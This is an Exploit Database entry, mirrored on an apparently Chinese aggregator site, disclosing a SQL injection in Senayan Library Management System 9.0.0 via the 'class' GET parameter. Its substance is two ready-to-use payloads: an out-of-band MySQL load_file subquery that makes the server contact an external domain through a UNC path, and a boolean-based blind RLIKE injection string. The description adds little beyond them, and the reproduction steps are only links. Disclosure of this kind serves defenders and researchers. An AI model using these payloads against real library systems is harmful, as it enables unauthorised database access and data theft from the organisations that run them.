Senayan Library Management System v9.0.0 – SQL Injection

• Exploit Database
• 87 阅读

• 作者： nu11secur1ty
  日期： 2023-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51161/

• ## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
  ## Author: nu11secur1ty
  ## Date: 11.09.2022
  ## Vendor: https://slims.web.id/web/
  ## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi
  
  ## Description:
  The manual insertion `point 3` with `class` parameter appears to be
  vulnerable to SQL injection attacks.
  The payload '+(select
  load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'
  was submitted in the manual insertion point 3.
  This payload injects a SQL sub-query that calls MySQL's load_file
  function with a UNC file path that references a URL on an external
  domain.
  The application interacted with that domain, indicating that the
  injected SQL query was executed.
  
  ## STATUS: HIGH Vulnerability
  
  [+] Payload:
  
  ```MySQL
  ---
  Parameter: class (GET)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
  or GROUP BY clause
  Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
  (CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND
  'dLjf'='dLjf&membershipType=a&collType=aaaa
  ---
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)
  
  ## Proof and Exploit:
  [href](http://localhost:5001/sy5wji)
  
  ## Time spent
  `03:00:00`
  
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at
  https://packetstormsecurity.com/https://cve.mitre.org/index.html and
  https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  

  Python

  Copy